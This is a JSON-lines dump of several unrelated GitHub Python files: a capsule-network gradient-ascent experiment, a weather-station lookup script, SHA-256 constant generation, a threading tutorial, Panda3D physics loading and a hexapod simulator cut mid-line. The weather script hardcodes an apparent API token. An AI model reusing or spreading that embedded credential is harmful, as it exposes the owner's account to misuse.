else:\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n \n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph and restore variables \n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n saver.restore(sess, latest_ckpt_path)\n\n # compute the gradients\n result_grads, batched_images, caps_norms_tensor = VIS_GRAD_COMPUTER[aspect_type].compute_grads(0)\n n_repeats = len(result_grads)\n print('Number of gradients computed (= n_repeats = number of batches per epoch): ',\n n_repeats)\n \n batched_labels_t = tf.get_collection('tower_%d_batched_labels' % 0)[0]\n\n # get batched dataset and specs\n batched_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n split=split, n_repeats=n_repeats)\n iterator = batched_dataset.make_initializable_iterator()\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n\n if split == 'noise':\n num_class_loop = 1\n else:\n num_class_loop = specs['num_classes'] \n for i in range(max_epochs):\n for j in range(num_class_loop):\n for k in range(n_repeats):\n try:\n # get batched values\n batch_val = sess.run(batch_data)\n\n # run gradient ascent {iter_n} iterations with {step} step size\n # and threshold to get gradient ascended stacked image tensor\n # (iter_n, 1, 24, 24) and (iter_n, 3, 24, 24)\n img0 = batch_val['images']\n iter_n_recorded, ga_img_list = utils.run_gradient_ascent(\n result_grads[k], img0, batched_images, sess, iter_n, step, threshold)\n \n pred_class_prob_list = [] # list of probabilities of classes\n pred_class_entropy_list = [] # list of probabilities of prediction entropies\n for img in ga_img_list:\n pred = sess.run(caps_norms_tensor, feed_dict={batched_images: img}) # (1, 10)\n pred = np.reshape(pred, -1) # (10,)\n pred_cl = np.argmax(pred) # ()\n\n entropy = _compute_entropy(pred)\n \n # winning capsule mask\n win_cap_mask = np.array([0.0 for _ in range(10)])\n win_cap_mask[pred_cl] = 1.0\n win_cap_mask = np.expand_dims(win_cap_mask, axis=0)\n # all capsules mask\n all_cap_mask = np.expand_dims(np.array([1.0 for _ in range(10)]), axis=0)\n\n pred_class_prob_list.append(pred) # [(10,), (10,), ...]\n pred_class_entropy_list.append(entropy)\n\n ga_iter_matr = np.array(iter_n_recorded)\n ga_img_matr = np.stack(ga_img_list, axis=0)\n pred_class_prob_matr = np.stack(pred_class_prob_list)\n pred_class_entropy_matr = np.stack(pred_class_entropy_list, axis=0)\n\n # save to npz file\n npzfname = 'instance_{}-lbl0_{}-lbl1_{}.npz'.format(i, j, k)\n npzfname = os.path.join(write_dir, npzfname)\n np.savez(npzfname, iters=ga_iter_matr, images=ga_img_matr, pred=pred_class_prob_matr, \n pred_entropy=pred_class_entropy_matr)\n\n print('{0} {1} total:class:gradient = {2:.1f}% ~ {3:.1f}% ~ {4:.1f}%'.format(\n ' '*5, '-'*5, \n 100.0*(i * num_class_loop * n_repeats + j * n_repeats + k + 1) / (max_epochs * num_class_loop * n_repeats),\n 100.0*(j * n_repeats + k + 1)/(num_class_loop * n_repeats),\n 100.0*(k + 1)/n_repeats), end='\\r')\n except tf.errors.OutOfRangeError:\n break\n print()\n\ndef explore_norm_aspect(num_gpus, data_dir, dataset, image_size,\n total_batch_size, summary_dir, max_epochs,\n iter_n, step, threshold,\n aspect_type):\n \"\"\"Run gradient ascent on given images.\n \n Args:\n num_gpus: number of GPUs available to use;\n data_dir: the directory containing the input data;\n dataset: dataset name;\n image_size: image size after cropping or resizing;\n total_batch_size: total batch size, ≡ 1;\n summary_dir: the directory to write files;\n max_epochs: numbers of instance to use;\n iter_n: number of iterations to add gradients to original images;\n step: step size of each iteration of gradient ascent;\n threshold: any gradients less than this value will not be added to the original images;\n aspect_type: 'naive_max_norm', 'max_norm_diff', or 'noise_naive_max_norm', 'noise_max_norm_diff'.\n \"\"\"\n # define load_dir and summary_dir\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, aspect_type)\n # declare an empty model graph\n with tf.Graph().as_default():\n # call run_norm_aspect\n run_norm_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type)\n\ndef run_direction_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type):\n \"\"\"Run direction aspect exploration. Producing results to summary_dir.\n\n Args:\n num_gpus: number of GPUs available to use;\n total_batch_size: total batch size. ≡ 1;\n max_epochs: number of instance to produce;\n data_dir: the directory containing the input data;\n dataset: dataset name;\n image_size: image size after cropping or resizing;\n iter_n: number of iterations to add gradients to original images;\n step: step size of each iteration of gradient ascent to multiply;\n threshold: any gradients less than this value will not be added to original images;\n load_dir: the directory to load files;\n summary_dir: the directory to write files;\n aspect_type: 'naive_max_caps_dim', 'max_caps_dim_diff', or 'noise_naive_max_caps_dim', 'max_caps_dim_diff'.\n \"\"\"\n # Write specs file\n write_dir = _write_specs_file(summary_dir, aspect_type, dataset, total_batch_size,\n max_epochs, iter_n, step, threshold)\n \n # Find out to feed in noise of data\n if 'noise_' in aspect_type:\n aspect_type = aspect_type[6:]\n split = 'noise'\n else:\n split = 'dream'\n\n # Find latest checkpoint information\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('Checkpoint files not found!')\n else:\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # Import compute graph and restore variables\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n saver.restore(sess, latest_ckpt_path)\n\n # Compute the gradients\n result_grads, batched_images, caps_norms_tensor= VIS_GRAD_COMPUTER[aspect_type].compute_grads(0)\n n_repeats = 16 # 16 dimensional vector\n print('Number of gradients computed: ', len(result_grads))\n\n batched_labels_t = tf.get_collection('tower_%d_batched_labels' % 0)[0]\n\n # Get batched dataset and specs\n batched_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs, \n data_dir, dataset, image_size,\n split=split, n_repeats=n_repeats)\n iterator = batched_dataset.make_initializable_iterator()\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n\n # Suppose now we feed in image with lbl0 = '0',\n # and only run experiment on maximizing one specific \n # dimension of capsule '0'.\n num_class_loop = specs['num_classes'] \n for i in range(max_epochs): # instance number \n for j in range(num_class_loop): # j is the index of the target label capsule\n for k in range(n_repeats): # 16 dimensional wise loop\n try:\n # Get batched values\n batch_val = sess.run(batch_data)\n\n # Run gradient ascent {iter_n} iterations with step_size={step}\n # and threshold to get gradient ascended stacked image tensor\n # (iter_n, 1, 24, 24) and (iter_n, 3, 24, 24)\n img0 = batch_val['images']\n iter_n_recorded, ga_img_list = utils.run_gradient_ascent(\n result_grads[j*num_class_loop+k], img0, batched_images, sess, iter_n, step, threshold)\n \n pred_class_prob_list = [] # list of (predicted_class, probabilities of predicted class)s\n pred_class_entropy_list = []\n\n for img in ga_img_list:\n pred = sess.run(caps_norms_tensor, feed_dict={batched_images: img}) # (1, 10)\n pred = np.reshape(pred, -1) # (10,)\n pred_cl = np.argmax(pred) # ()\n\n entropy = _compute_entropy(pred)\n\n # winning capsule mask\n win_cap_mask = np.array([0.0 for _ in range(10)])\n win_cap_mask[pred_cl] = 1.0 \n win_cap_mask = np.expand_dims(win_cap_mask, axis=0)\n # all capsules mask\n all_cap_mask = np.expand_dims(np.array([1.0 for _ in range(10)]), axis=0)\n\n pred_class_prob_list.append(pred)\n pred_class_entropy_list.append(entropy)\n\n ga_iter_matr = np.array(iter_n_recorded)\n ga_img_matr = np.stack(ga_img_list, axis=0)\n pred_class_prob_matr = np.stack(pred_class_prob_list)\n pred_class_entropy_matr = np.stack(pred_class_entropy_list, axis=0)\n\n # save to npz file\n npzfname = 'instance_{}-cap_{}-dim_{}.npz'.format(i, j, k)\n npzfname = os.path.join(write_dir, npzfname)\n np.savez(npzfname, iters=ga_iter_matr, images=ga_img_matr, pred=pred_class_prob_matr,\n pred_entropy=pred_class_entropy_matr)\n\n print('{0} {1} total:class:gradient = {2:.1f}% ~ {3:.1f}% ~ {4:.1f}%'.format(\n ' '*5, '-'*5, \n 100.0*(i * num_class_loop * n_repeats + j * n_repeats + k + 1) / (max_epochs * num_class_loop * n_repeats),\n 100.0*(j * n_repeats + k + 1)/(num_class_loop * n_repeats),\n 100.0*(k + 1)/n_repeats), end='\\r')\n except tf.errors.OutOfRangeError:\n break\n print()\n\ndef explore_direction_aspect(num_gpus, data_dir, dataset, image_size,\n total_batch_size, summary_dir, max_epochs,\n iter_n, step, threshold, aspect_type):\n \"\"\"Start direction aspect exploration. Producing results to summary_dir.\n\n Args:\n num_gpus: number of GPUs available to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiments;\n image_size: image size after cropping or resizing;\n total_batch_size: total batch size, ≡ 1;\n summary_dir: the directory to write files;\n max_epochs: number of different instance for the same class;\n iter_n: number of iterations to add gradients to original image;\n step: step size of each iteration of gradient ascent to mutliply;\n threshold: any gradients less than this value will not be added to the original image;\n aspect_type: 'naive_max_caps_dim', 'max_caps_dim_diff', or 'noise_naive_max_caps_dim', 'max_caps_dim_diff'.\n \"\"\"\n # define load_dir and summary_dir\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, aspect_type)\n # delare an empty model graph\n with tf.Graph().as_default():\n # call run direction aspect\n run_direction_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type)\n\ndef main(_):\n hparams = default_hparams()\n if FLAGS.hparams_override:\n hparams.parse(FLAGS.hparams_override)\n \n if FLAGS.mode == 'train':\n train(hparams, FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.model, FLAGS.total_batch_size, FLAGS.image_size, \n FLAGS.summary_dir, FLAGS.save_epochs, FLAGS.max_epochs)\n if FLAGS.mode == 'test':\n test(FLAGS.split, FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.total_batch_size, FLAGS.image_size, FLAGS.summary_dir, FLAGS.max_epochs)\n elif FLAGS.mode == 'evaluate':\n evaluate(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.model, FLAGS.total_batch_size, FLAGS.image_size,\n FLAGS.threshold, FLAGS.summary_dir, FLAGS.max_epochs)\n elif FLAGS.mode == 'glitch':\n pass\n elif FLAGS.mode in NORM_ASPECT_TYPES or FLAGS.mode in ['noise_' + aspect for aspect in NORM_ASPECT_TYPES]:\n explore_norm_aspect(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.image_size,\n FLAGS.total_batch_size, FLAGS.summary_dir, FLAGS.max_epochs,\n FLAGS.iter_n, float(FLAGS.step), float(FLAGS.threshold),\n FLAGS.mode)\n elif FLAGS.mode in DIRECTION_ASPECT_TYPES or FLAGS.mode in ['noise_' + aspect for aspect in DIRECTION_ASPECT_TYPES]:\n explore_direction_aspect(FLAGS.num_gpus, FLAGS.data_dir, FLAGS.dataset, FLAGS.image_size,\n FLAGS.total_batch_size, FLAGS.summary_dir, FLAGS.max_epochs,\n FLAGS.iter_n, float(FLAGS.step), float(FLAGS.threshold),\n FLAGS.mode)\n else:\n raise ValueError(\"No matching mode found for '{}'\".format(FLAGS.mode))\n\nif __name__ == '__main__':\n tf.app.run()\n ","repo_name":"HAXRD/Capsule-Specific-Attacks","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":37434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11831229185","text":"import urllib.parse\nimport requests\nimport pandas as pd\n\ntoken = '0939c8c78a5a460e8685922d985d500f' # API token\noutput = 'json' # Output format\n\ndef closest_station(latitude, longitude):\n\n #########################################################\n ## Find closest weather station to turbine coordinates ##\n #########################################################\n radius = '20'\n\n # Station metadata API URL\n metadata_api = 'https://api.synopticlabs.org/v2/stations/metadata?&'\n\n # URL to be sent to API\n url = metadata_api + urllib.parse.urlencode({'token': token,\n 'output': output,\n 'radius': str(latitude)+','+str(longitude)+','+radius,\n 'status': 'active',\n 'limit': '10',\n 'vars': 'wind_speed,wind_gust,wind_direction,peak_wind_speed'})\n\n # API GET request\n json_data = requests.get(url).json()\n json_number_of_stations = json_data['SUMMARY']['NUMBER_OF_OBJECTS']\n station_id = []\n station_distance = []\n station_index = []\n\n for i in range(0, int(json_number_of_stations)):\n json_period_start = json_data['STATION'][i]['PERIOD_OF_RECORD']['start']\n json_period_end = json_data['STATION'][i]['PERIOD_OF_RECORD']['end']\n json_station_id = json_data['STATION'][i]['STID']\n json_station_distance = json_data['STATION'][i]['DISTANCE']\n if (int(json_period_end[:-16]) - int(json_period_start[:-16])) >= 9:\n station_distance.insert(i,json_station_distance)\n station_id.insert(i,json_station_id)\n station_index.insert(i,i)\n if not station_distance:\n print('No weather stations within ' + radius + ' miles have 10 years of wind speed data, try increasing range.')\n quit()\n\n min_station_distance = min(station_distance)\n min_station_distance_idx = station_distance.index(min_station_distance)\n closest_station = station_id[min_station_distance_idx]\n \n return closest_station\n\n#print(closest_station(43.26304252,-77.06442432))","repo_name":"Bodei/windapp","sub_path":"closest_station.py","file_name":"closest_station.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22338245366","text":"import time,math\n\nclass Constants:\n def __init__(self):\n self.constants()\n\n\n def constants(self):\n numPrimes = 0 \n num = 2\n primeNums = []\n while numPrimes < 64:\n for i in range(2,num):\n if (num % i) == 0:\n num += 1\n break\n else:\n numPrimes += 1\n primeNums.append(num)\n num += 1\n\n constants = []\n for i,p in enumerate(primeNums):\n time.sleep(0.15)\n cubedPrime = str(p**(1./3.))\n print(str(i) + \" = \" + \"∛{}\".format(p) + \" = \" + cubedPrime,end='\\r')\n \n cubedPrime = float(cubedPrime)\n fractional = cubedPrime - math.floor(cubedPrime)\n \n time.sleep(0.15)\n print(str(i) + \" = \" + \"∛{}\".format(p) + \" = \" + str(fractional),end='\\r')\n\n constant = bin(math.floor(fractional*2**32)).lstrip('-0b')\n constant = (32-len(constant))*'0' + constant\n time.sleep(0.15)\n print(str(i) + \" = \" + str(constant))\n constants.append(constants)\n\n\n\n return constants\n\n\n\n\n\n\n\n\n\nConstants()\n\n","repo_name":"ivan-fediaev/sha256-python","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18922798026","text":"# MultiThreading is a techniqu which allow a cpu to \n# excute Multipal Threads of one process\n# run Multipal task and funations at the same time .\n# single threading and mulitpal threading\n# thread class methods \n# rUn(), start(),join(), isalive(), setname(), getname()\n# class A:\n# def run(self):\n# for i in range(5):\n# print(\"ankit Singh\")\n# class B:\n# def run(self):\n# for i in range(5):\n# print(\"shivi singh\") \n# t1=A()\n# t2=B()\n# t1.run()\n# t2.run() \n\n# from time import sleep\n# class A:\n# def run(self):\n# for i in range(5):\n# print(\"ankit Singh\")\n# sleep(1)\n# class B:\n# def run(self):\n# for i in range(5):\n# print(\"shivi singh\")\n# sleep(1)\n# t1=A()\n# t2=B()\n# t1.run()\n# t2.run() \n\nfrom threading import Thread\nclass A(Thread):\n def run(self):\n for i in range(5):\n print(\"ankit Singh\")\nclass B(Thread):\n def run(self):\n for i in range(5):\n print(\"shivi singh\")\nt1=A()\nt2=B()\nt1.start()\nt2.start() ","repo_name":"ankit-singh1718190/python-learn","sub_path":"MultiThreading.py","file_name":"MultiThreading.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15259687987","text":"from panda3d.bullet import *\nfrom panda3d.core import *\n\norder = 100\ntarget = 'object'\n\ndef get_used_materials(geom_np):\n materials = []\n geom_node = geom_np.node()\n for i, geom in enumerate(geom_node.getGeoms()):\n use_geom = True\n gs = geom_node.getGeomState(i)\n m_att = gs.getAttrib(MaterialAttrib)\n if m_att: \n materials.append(m_att.getMaterial().getName())\n return materials\n\ndef make_bullet_mesh(scene, m_type, geom_np):\n mesh = m_type()\n geom_node = geom_np.node()\n for i, geom in enumerate(geom_node.getGeoms()):\n use_geom = True\n gs = geom_node.getGeomState(i)\n m_att = gs.getAttrib(MaterialAttrib)\n if m_att:\n m_name = m_att.getMaterial().getName()\n m_data = scene.data_dict['materials'][m_name]\n if not m_data['use_physics']:\n use_geom = False\n if use_geom:\n mesh.addGeom(geom)\n return mesh\n\ndef make_collision_bounds_shape(scene, obj, dynamic=True):\n shapes_grp2 = {'CYLINDER':BulletCylinderShape, \n 'CAPSULE':BulletCapsuleShape, \n 'CONE':BulletConeShape}\n \n shapes_grp3 = {'CONVEX_HULL':BulletConvexHullShape, \n 'TRIANGLE_MESH':BulletTriangleMeshShape}\n \n if obj['phys_collision_bounds'] == 'BOX':\n shape = BulletBoxShape(Vec3(*obj['phys_bb']))\n elif obj['phys_collision_bounds'] == 'SPHERE':\n shape = BulletSphereShape(max(obj['phys_bb']))\n elif obj['phys_collision_bounds'] in shapes_grp2.keys():\n # CYLINDER, CAPSULE, CONE\n radius = max(obj['phys_bb'][0], obj['phys_bb'][1])\n if obj['phys_collision_bounds'] == 'CAPSULE':\n height = obj['phys_bb'][2]\n else:\n height = obj['phys_bb'][2]*2\n sfunc = shapes_grp2[obj['phys_collision_bounds']]\n shape = sfunc(radius, height, ZUp)\n elif obj['phys_collision_bounds'] == 'TRIANGLE_MESH':\n mesh = make_bullet_mesh(scene, BulletTriangleMesh, scene.meshes[obj['name']])\n shape = BulletTriangleMeshShape(mesh, dynamic=dynamic)\n elif obj['phys_collision_bounds'] == 'CONVEX_HULL':\n shape = make_bullet_mesh(scene, BulletConvexHullShape, scene.meshes[obj['name']])\n else:\n raise Exception('Unknown collision bound: %s' % obj['phys_collision_bounds'])\n \n shape.setMargin(obj['phys_collision_margin'])\n \n return shape\n \n\n\ndef invoke(scene, obj, action):\n\n if action == 'LOAD':\n \n node = BulletRigidBodyNode(obj['name'])\n shape = None\n if obj['phys_type'] == 'STATIC':\n if 'phys_collision_bounds' in obj:\n shape = make_collision_bounds_shape(scene, obj, dynamic=False)\n else:\n if obj['type'] == 'MESH':\n mesh = make_bullet_mesh(scene, BulletTriangleMesh, scene.meshes[obj['name']])\n shape = BulletTriangleMeshShape(mesh, dynamic=False)\n \n elif obj['phys_type'] == 'RIGID_BODY':\n if 'phys_collision_bounds' in obj:\n shape = make_collision_bounds_shape(scene, obj)\n else:\n shape = BulletSphereShape(obj['phys_radius'])\n \n node.setMass(obj['phys_mass'])\n\n\n if shape:\n node.addShape(shape)\n\n if 'phys_mat_order' in obj and obj['phys_mat_order']:# and not 'phys_collision_bounds' in obj:\n for m_name in obj['phys_mat_order']:\n mat = scene.data_dict['materials'][m_name]\n if mat['use_physics']:\n node.set_friction(mat['phys_friction'])\n node.set_restitution(mat['phys_elasticity'])\n break\n else:\n node.set_friction(1.0)\n \n # Sleepeng (deactivation) options\n if obj['phys_deactivation']:\n scene_data = scene.data_dict['scene']\n node.set_angular_sleep_threshold(scene_data['phys_deactivation_angular_threshold'])\n node.set_linear_sleep_threshold(scene_data['phys_deactivation_linear_threshold'])\n node.set_deactivation_time(scene_data['phys_deactivation_time'])\n node.set_active(True)\n else:\n node.set_deactivation_enabled(False)\n\n\n if 'phys_friction_coefficients' in obj:\n node.set_anisotropic_friction(Vec3(*obj['phys_friction_coefficients']))\n \n # Linear and angular damping\n node.set_linear_damping(obj['phys_linear_damping'])\n node.set_angular_damping(obj['phys_angular_damping'])\n #node.set_inertia(0.9)\n \n # Linear and angular locking\n if True in obj['phys_lock_location']:\n v = Vec3(*map(int, obj['phys_lock_location']))\n node.set_linear_factor(v)\n if True in obj['phys_lock_rotation']:\n v = Vec3(*map(int, obj['phys_lock_rotation']))\n node.set_angular_factor(v)\n \n np = scene.root.attachNewNode(node)\n \n mask = BitMask32()\n for i,val in enumerate(obj['phys_collision_mask']):\n if val: mask.set_bit(i)\n np.set_collide_mask(mask)\n \n np.setMat(scene.meshes[obj['name']].getMat())\n\n scene.meshes[obj['name']].wrtReparentTo(np)\n scene.phys_world.attachRigidBody(node)\n \n scene.objects[obj['name']] = np\n\n if obj['invisible']:\n scene.meshes[obj['name']].hide()\n","repo_name":"09th/Blender4Panda-loader","sub_path":"ext/phys_object.py","file_name":"phys_object.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74142993106","text":"# -^- coding:utf-8 -^-\n\"\"\"\n使用方法:\nimport toyrep as vrep\nN=5\n别的不变\n\n说明\n该文件主要由两部分构成,一部分是针对六足机器人的定义以及模型中一些物体的定义,一部分是针对vrep的API函数\n\n文件执行过程:\nimport时初始化\n调用了setobjectPosition类似的东西时会保存一个相对参考系的值(比如腿相对身体的值),后面再一并更新\n会在simxSynchronousTrigger 被调用的时候更新所有物体的状态,以及检查碰撞(现在的逻辑是碰到了就爆炸),还有可视化\n\n定义部分:\n基类:rep_obj, 负责管理handle,name,parent等等信息\n每个类都要有 refresh draw collision_check reset这几个函数,\n\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nimport numpy as np\nimport time\nfrom actorcritic.config import *\nfrom actorcritic import Tlogger\nfrom actorcritic.terrianMap import heightMap\n\nWORLD_SIZE = [-5,5]\n\nNAME = {} # name -> handle\nHANDLE = {}# handle -> obj\nH_count = 0\ntlogger = Tlogger\nprint(tlogger)\n#whether make sure that the body position is near the middle of the fixed legs\n\nterrianContactBallheight = 0.025\n\n# DISPLAY = True\n\n\ndef Handle(obj):\n global H_count\n H_count+=1\n HANDLE[H_count]=obj\n return H_count\n\ndef topology(x,y):\n if MAP==\"fence\":\n for f in FENCE:\n if(abs(x-f.x)<=f.r):\n return f.h\n return 0\n \n # height = 0\n height = heightMap(x,y)\n for c in CLDS:\n if((x-c.loc[0])**2+(y-c.loc[1])**2<= c.size**2):\n height = max(height,c.size)\n \n return height\n\nTOPO = topology\n\n\ndef turnVec(vec,deg):\n \"\"\"\n Get the vector after turned the vec some degree\n \"\"\"\n assert(vec.shape==(3,))\n return np.array([\n vec[0]*np.cos(deg) - vec[1]*np.sin(deg),\n vec[0]*np.sin(deg) + vec[1]*np.cos(deg),\n vec[2]\n ])\n\ndef distance(vec1,vec2):\n return np.sqrt(np.sum(((vec1-vec2)**2)))\n\ndef diff_ang(vec1,vec2):\n ang = math.atan2(vec1[1],vec1[0])-math.atan2(vec2[1],vec2[0])\n if(ang<-math.pi):\n ang+= math.pi\n elif (ang>math.pi):\n ang-=math.pi\n return ang\n\ndef ave_ang(angs):\n angs = np.array(angs)\n x = np.cos(angs)\n y = np.sin(angs)\n return math.atan2(np.sum(y),np.sum(x))\n\nclass rep_obj:\n def __init__(self,name,parent):\n if(type(name)!=list):\n name=[name]\n self.handle=[]\n for n in name:\n h = Handle(self)\n self.handle.append(h)\n NAME[n] = h\n self.parent = parent\n self.state = True\n\nclass Botnode(rep_obj):\n def __init__(self,loc,name,parent):\n self.p=np.array(loc) #the position in BCS\n assert(self.p.shape==(3,))\n super(Botnode, self).__init__(name,parent)\n # print(self.p,parent.toGlob(self.p))\n self.parent = parent\n self.loc = parent.loc + parent.toGlob(self.p) # the position in -1\n \n def reset(self,loc):\n self.p=np.array(loc)\n self.loc = self.parent.loc + self.parent.toGlob(self.p)\n self.state = True\n\n def fixed(self):\n return self.loc[2] <= TOPO(self.loc[0],self.loc[1]) + 0.005 + terrianContactBallheight\n\nbasAng = [1,3,5,-1,-3,-5]\nbasAng = np.array(basAng)*math.pi/6\n\n\nclass Hexpod(rep_obj):\n def __init__(self,reset = False):\n self.ori = 0\n height = 4.4652e-01 +terrianContactBallheight\n self.loc = np.array([0,0,height])\n if(not reset):\n self.loc_sol = [] # the location get solving one constraints, for debugging\n self.ori_sol = []\n super(Hexpod, self).__init__(\"BCS\",None)\n self.tips=[]\n self.state = True\n\n tip_start_loc = [[ 5.27530670e-01 , 3.04633737e-01 ,-height],\n [-2.28881836e-05 , 6.09106421e-01 ,-height],\n [-5.27527809e-01 , 3.04500699e-01 ,-height],\n [ 5.27622223e-01 ,-3.04508090e-01 ,-height],\n [ 1.44958496e-04 ,-6.09171569e-01 ,-height],\n [-5.27413368e-01 ,-3.04654479e-01 ,-height]]\n for i,loc in enumerate(tip_start_loc):\n if(not reset):\n self.tips.append(Botnode(loc,['TipTarget'+str(i+1),'Tip'+str(i+1)],self))\n else:\n self.tips[i].reset(loc)\n if(not reset):\n self.shape_nodes=[]\n #shape_nodes 用于在画图时画出机器人身体形状\n u1_loc = [[ 1.31711960e-01, 7.59007931e-02 ,-1.78813934e-06],\n [ 1.38759613e-04, 1.51954651e-01 ,-1.78813934e-06],\n [-1.31512642e-01, 7.60353804e-02, -1.72853470e-06],\n [ 1.31635189e-01, -7.60723352e-02 ,-1.84774399e-06],\n [-1.66893005e-05, -1.51991248e-01 ,-1.90734863e-06],\n [-1.31590843e-01, -7.59376287e-02 ,-1.78813934e-06]]\n u2_loc = [[ 0.27454329 , 0.0521549 ,0.11723149],\n [ 0.09211826 , 0.26377678 ,0.11723149],\n [-0.18236399 , 0.21160328 ,0.11723131],\n [ 0.1824851 ,-0.21164024 ,0.11723143],\n [-0.09199619 ,-0.2638135 ,0.11723149],\n [-0.27442122 ,-0.05219185 ,0.11723137]]\n u3_loc = [[ 0.18251514 , 0.21148705 ,0.11723095],\n [-0.0918808 , 0.26374376 ,0.11723089],\n [-0.27433491 , 0.05223811 ,0.11723095],\n [ 0.27445745 ,-0.05227506 ,0.11723095],\n [ 0.09200335 ,-0.26378036 ,0.11723101],\n [-0.18239307 ,-0.21152413 ,0.11723095]]\n\n for i,loc in enumerate(u1_loc):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'Hip'+str(i+1),self))\n else:\n self.shape_nodes[i].reset(loc)\n \n if(not reset):\n self.shape_nodes.append(Botnode(u2_loc[0],'J21R',self))\n else:\n self.shape_nodes[6].reset(u2_loc[0])\n for i,loc in enumerate(u2_loc[1:]):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'J21R'+str(i-1),self))\n else:\n self.shape_nodes[7+i].reset(loc)\n \n if(not reset):\n self.shape_nodes.append(Botnode(u3_loc[0],'J31R',self))\n else:\n self.shape_nodes[12].reset(u3_loc[0])\n for i,loc in enumerate(u3_loc[1:]):\n if(not reset):\n self.shape_nodes.append(Botnode(loc,'J31R'+str(i-1),self))\n else:\n self.shape_nodes[13+i].reset(loc)\n\n def reset(self):\n self.__init__(reset=True)\n\n def toGlob(self,vec):\n \"\"\"\n 相对身体坐标系转世界坐标系\n \"\"\"\n return turnVec(vec,self.ori)\n\n def explode(self):\n for t in self.tips:\n t.p*=1000000\n t.loc*=1000000\n t.state = False\n self.state = False\n self.loc = np.array([1e+22]*3)\n # for t in self.shape_nodes:\n # t.state = False\n \n def draw(self,ax):\n for i,t in enumerate(self.tips):\n # ax.plot([self.loc[0],t.loc[0]],\n # [self.loc[1],t.loc[1]],\n # [self.loc[2],t.loc[2]],\n # \"-r\")\n for j in range(i,len(self.shape_nodes),6):\n ax.plot([self.shape_nodes[j].loc[0],t.loc[0]],\n [self.shape_nodes[j].loc[1],t.loc[1]],\n [self.shape_nodes[j].loc[2],t.loc[2]],\n \"-b\")\n x = []\n y = []\n z = []\n for i in range(len(self.shape_nodes)):\n x.append(self.shape_nodes[i].loc[0])\n y.append(self.shape_nodes[i].loc[1])\n z.append(self.shape_nodes[i].loc[2])\n ax.plot(x,y,z,\"-b\")\n #draw orientation\n for i in self.ori_sol:\n orivec = np.array([math.cos(i),math.sin(i)]) * 0.5\n ax.plot([self.loc[0],self.loc[0]+orivec[0]],\n [self.loc[1],self.loc[1]+orivec[1]],\n 0.646,\n \"-r\")\n i = self.ori\n orivec = np.array([math.cos(i),math.sin(i)]) * 0.5\n ax.plot([self.loc[0],self.loc[0]+orivec[0]],\n [self.loc[1],self.loc[1]+orivec[1]],\n 0.646,\n \"-g\")\n\n def printState(self):\n print(\"t.loc | t.p\")\n for t in self.tips:\n print(t.loc,t.p)\n print(\"self.loc\",self.loc,\"self.ori\",self.ori)\n\n def refresh(self):\n \"\"\"\n refresh 的过程,先确定身高(这时假设身体的欧拉角永远前两个数是0)\n 再确定踩在地上的脚\n 再确定身体坐标\n 再推出其他坐标\n \"\"\"\n #solve the position of body\n\n # refresh the height\n if(not self.state):\n return \n\n self.loc_sol = []\n self.ori_sol = []\n for t in self.tips:\n if(t.fixed()):\n newloc = t.loc - t.p # as the height has no influence of the ang\n self.loc_sol.append(newloc)\n\n #To solve the problem Error: zero-size array to reduction operation maximum which has no identity\n if(len(self.loc_sol)==0):\n print(\"ERROR, self.loc_sol empty \\n DATAS: \\n\")\n self.printState()\n self.explode()\n return\n\n \n self.loc[2] = np.max(np.array(self.loc_sol),axis=0)[2]\n for t in self.tips:\n t.loc[2] = self.loc[2] + t.p[2]\n\n # refresh the ori\n for t in self.tips:\n if(t.fixed()):\n dif_loc = t.loc-self.loc\n ori = diff_ang(dif_loc,t.p)\n self.ori_sol.append(ori)\n self.ori = ave_ang(self.ori_sol)\n\n # refresh the loc of all nodes\n self.loc_sol = []\n for t in self.tips:\n if(t.fixed()):\n newloc = t.loc - self.toGlob(t.p)\n self.loc_sol.append(newloc)\n self.loc = np.average(np.array(self.loc_sol),axis = 0)\n \n for t in self.tips:\n t.loc = self.loc + self.toGlob(t.p)\n for t in 